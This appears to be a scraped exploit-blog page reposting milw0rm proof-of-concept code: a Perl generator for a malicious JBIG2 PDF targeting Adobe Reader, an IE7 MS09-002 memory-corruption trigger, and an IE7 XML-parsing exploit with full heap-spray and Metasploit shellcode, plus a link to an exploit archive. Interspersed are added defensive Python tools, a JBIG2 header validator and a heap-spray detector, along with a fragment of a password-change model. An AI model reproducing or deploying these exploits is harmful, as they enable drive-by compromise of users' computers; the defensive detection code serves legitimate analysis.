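        self.users[uid] = hash_password(form["pass1"])
        return "changed"


def same_origin_script_attempt(service, sid):
    """Model of the iframe script: it can read the token from the rendered form and
    submit a new password, but it does not know the victim's current password."""
    form = service.render_edit_form(sid)
    return service.change_password(sid, {
        "form_token": form["form_token"], "pass1": "password", "pass2": "password",
    })


def demo(require_current_password):
    """Returns (outcome of the scripted attempt, outcome of a legitimate change)."""
    svc = AccountService(require_current_password)
    svc.add_user(1, "admin-secret")
    sid = svc.login(1, "admin-secret")
    scripted = same_origin_script_attempt(svc, sid)
    form = svc.render_edit_form(sid)
    legit = svc.change_password(sid, {
        "form_token": form["form_token"], "current": "admin-secret",
        "pass1": "new-secret", "pass2": "new-secret",
    })
    return scripted, legit


if __name__ == "__main__":
    print("token only:", demo(False))
    print("token + current password:", demo(True))
```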

[ highlighted ]

Posted by zerialkiller in exploits with 0 comments

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day   && MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;

print pdf();

sub pdf()
{

"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0      \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n"  .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
"   \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
"         \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .

"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .

"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";

}

# milw0rm.com [2009-02-23]
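As an added defensive example (my own code, not part of the PoC and not Adobe's), the following Python parses the segment headers of an embedded JBIG2 stream per ITU-T T.88 section 7.2 and reports a declared segment data length that overruns the stream, which is what the PoC's header (segment 1, flags 0x40, page association "ABCD", length field starting with 0x13) does. The PDF stream extraction is a plain regex, an assumption that holds for uncompressed objects like the PoC's; the sample streams are constructed.

```python
import re
import struct


class JBIG2Error(ValueError):
    """Malformed or truncated segment header."""


def parse_segment_header(data, offset=0):
    """Parse one JBIG2 segment header (embedded-stream organisation, T.88 7.2).
    Returns (segment number, type, page association, data length, header end)."""
    pos = offset

    def take(n):
        nonlocal pos
        if pos + n > len(data):
            raise JBIG2Error(f"truncated segment header at offset {offset}")
        chunk = data[pos:pos + n]
        pos += n
        return chunk

    seg_num = struct.unpack(">I", take(4))[0]
    flags = take(1)[0]
    seg_type = flags & 0x3F
    page_assoc_is_4_bytes = bool(flags & 0x40)
    rts = take(1)[0]
    ref_count = rts >> 5
    if ref_count == 7:                       # long form: 4-byte count plus retain bits
        pos -= 1
        ref_count = struct.unpack(">I", take(4))[0] & 0x1FFFFFFF
        take((ref_count + 8) // 8)
    ref_size = 1 if seg_num <= 256 else 2 if seg_num <= 65536 else 4
    take(ref_count * ref_size)               # referred-to segment numbers
    page = struct.unpack(">I", take(4))[0] if page_assoc_is_4_bytes else take(1)[0]
    data_length = struct.unpack(">I", take(4))[0]
    return seg_num, seg_type, page, data_length, pos


def check_jbig2_stream(data):
    """Walk every segment header and report lengths the stream cannot honour: a
    declared data length past the end of the stream, or the 'unknown length'
    marker on anything but an immediate generic region (types 38 and 39)."""
    findings = []
    offset = 0
    while offset < len(data):
        seg_num, seg_type, page, length, body = parse_segment_header(data, offset)
        if length == 0xFFFFFFFF:
            if seg_type not in (38, 39):
                findings.append((seg_num, "unknown-length-on-non-generic-region"))
            break                            # the next header cannot be located
        remaining = len(data) - body
        if length > remaining:
            findings.append((seg_num, f"declared {length} bytes, only {remaining} remain"))
            break
        offset = body + length
    return findings


STREAM_RE = re.compile(rb"/JBIG2Decode[^>]*>>\s*stream\r?\n(.*?)\s*endstream", re.S)


def check_pdf(pdf_bytes):
    """Run check_jbig2_stream on each /JBIG2Decode stream found by a simple regex
    (enough for unencrypted, uncompressed objects; a real tool walks the xref)."""
    results = []
    for m in STREAM_RE.finditer(pdf_bytes):
        try:
            results.append(check_jbig2_stream(m.group(1)))
        except JBIG2Error as exc:
            results.append([(None, str(exc))])
    return results


# Constructed from the PoC: segment 1, flags 0x40 (4-byte page association), page
# "ABCD", then a length field that starts with 0x13 and runs into the padding.
POC_STREAM = b"\x00\x00\x00\x01" + b"\x40\x00" + b"ABCD" + b"\x13" + b"A" * 64
# A well-formed page-information segment (type 48) with its 19-byte body.
BENIGN_STREAM = b"\x00\x00\x00\x00" + b"\x30\x00\x01" + struct.pack(">I", 19) + b"\x00" * 19
# Minimal constructed PDF fragment wrapping the PoC stream.
SAMPLE_PDF = (b"%PDF-1.5\n12 0 obj\n<</Subtype/Image/Width 640/Height 480/Length 1314"
              b"/Filter/JBIG2Decode>>\nstream\n" + POC_STREAM + b"endstream\nendobj\n")

if __name__ == "__main__":
    print(check_jbig2_stream(POC_STREAM))
    print(check_jbig2_stream(BENIGN_STREAM))
    print(check_pdf(SAMPLE_PDF))
```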

----------------------------------------------------------------------------------------------

MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xC0; i++) {
	array[i] = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() {
	o1=document.createElement("tbody");
	o1.click;
	var o2 = o1.cloneNode();
	o1.clearAttributes();
	o1=null; CollectGarbage();
	for(var x=0;x<a1.length;x++) a1[x].src=s1;
	o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

# milw0rm.com [2009-02-18]

Two small but very nice Xpl0itZ

Posted by zerialkiller in exploits with 1 comment

These exploits were published on http://www.milw0rm.com/ some time ago, so I hope you have already played with them as much as I have.

// k`sOSe 12/10/2008 – tested on winxp sp3, explorer 7.0.5730.13

// windows/exec – 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe

http://milw0rm.com/sploits/2008-iesploit.tar.gz

# milw0rm.com [2008-12-10]
----------------------------------------------------------------------------------------------

<html>
<script>

	// k`sOSe 12/10/2008
	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
 	// Heap spray address adjusted for Vista - muts / offensive-security.com
	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
	// http://www.offensive-security.com/0day/iesploit-vista.rar
	// windows/exec - 141 bytes
	// http://www.metasploit.com
	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  	var block = unescape("%u0c0c%u0c0c");
	var nops = unescape("%u9090%u9090%u9090");

	while (block.length < 81920) block += block;
	var memory = new Array();
	var i=0;
	for (;i<1000;i++) memory[i] += (block + nops + shellcode);

	document.write("<iframe src=\"iframe.html\">");

</script>

</html>

<!-- iframe.html

<XML ID=I>
	<X>
		<C>
			<![CDATA[
				<image
					SRC=http://&#3084;&#3084;.xxxxx.org
				>
			 ]]>

		</C>
	</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
	<XML ID=I>
	</XML>

	<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
	</SPAN>
</SPAN>

-->

# milw0rm.com [2008-12-10]
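As an added detection example (my own code, not from the PoCs or any vendor) covering the MS09-002 page above, str0ke's PoC and this XML DATASRC page, the following Python scores HTML for the heap-spray and trigger constructs the three share: the %u0c0c block, the string-doubling loop, a long unescape() blob, CollectGarbage(), cloneNode() followed by clearAttributes(), and the DATASRC binding. Patterns, weights and the sample pages are constructed for this example; the long unescape in the samples is a run of %u9090 units, not shellcode.

```python
import re

# Each indicator: (name, compiled pattern, weight). Patterns follow the three PoC
# pages above; the weights are my own choice, not from any product.
INDICATORS = [
    ("unescape-0c0c-block", re.compile(r'unescape\(\s*["\'](?:%u0c0c){2}', re.I), 3),
    ("string-doubling-loop",
     re.compile(r'while\s*\(\s*(\w+)\.length\s*<[^)]*\)\s*\{?\s*\1\s*\+=\s*\1', re.I), 2),
    ("long-unescape-blob", re.compile(r'unescape\(\s*["\'](?:%u[0-9a-f]{4}){16,}', re.I), 3),
    ("collect-garbage-call", re.compile(r'\bCollectGarbage\s*\(', re.I), 1),
    ("clone-then-clear-attributes",
     re.compile(r'\.cloneNode\(\)[\s\S]{0,200}?\.clearAttributes\(\)', re.I), 3),
    ("img-src-spray-pointer", re.compile(r'\.src\s*=\s*unescape\(\s*["\']%u0[bc]0[bc]', re.I), 2),
    ("xml-datasrc-binding",
     re.compile(r'<SPAN\s+DATASRC=#\w+\s+DATAFLD=\w+\s+DATAFORMATAS=HTML', re.I), 2),
]
SUSPICIOUS_SCORE = 5


def score_page(html):
    """Return (total weight of matched indicators, sorted indicator names)."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, sorted(hits)


def classify(html):
    return "suspicious" if score_page(html)[0] >= SUSPICIOUS_SCORE else "clean"


# Constructed samples keeping the PoCs' structure; NOP_RUN stands in for shellcode.
NOP_RUN = "%u9090" * 24

SAMPLE_TABLE_CLONE = """<html><body><script>
function spray_heap() {
    var payload = unescape("NOP_RUN");
    var nopsled = unescape("%u0c0c%u0c0c");
    while (nopsled.length < 0x40000)
        nopsled += nopsled;
    heap_chunks = new Array();
    for (var i = 0; i < 200; i++) heap_chunks[i] = nopsled + payload;
}
function trigger_bug() {
    var obj = document.createElement("table");
    obj.click;
    var obj_cp = obj.cloneNode();
    obj.clearAttributes();
    obj = null;
    CollectGarbage();
    var img = document.createElement("img");
    img.src = unescape("%u0c0c%u0c0cCCCCCCCC");
    obj_cp.click;
}
spray_heap(); trigger_bug();
</script></body></html>""".replace("NOP_RUN", NOP_RUN)

SAMPLE_XML_DATASRC = """<html><script>
    var shellcode = unescape("NOP_RUN");
    var block = unescape("%u0c0c%u0c0c");
    var nops = unescape("%u9090%u9090%u9090");
    while (block.length < 81920) block += block;
    var memory = new Array();
    for (var i = 0; i < 1000; i++) memory[i] += (block + nops + shellcode);
</script></html>
<XML ID=I><X><C></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML></SPAN>""".replace("NOP_RUN", NOP_RUN)

BENIGN = """<html><body><script>
var items = []; while (items.length < 10) { items.push(items.length); }
var img = new Image(); img.src = "/static/logo.png";
var copy = document.getElementById("t").cloneNode(true);
</script></body></html>"""

if __name__ == "__main__":
    for name, page in [("table-clone", SAMPLE_TABLE_CLONE),
                       ("xml-datasrc", SAMPLE_XML_DATASRC), ("benign", BENIGN)]:
        print(name, classify(page), score_page(page))
```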

bsqlhacker Advanced SQL Injection Framework

Posted by zerialkiller in exploits with 0 comments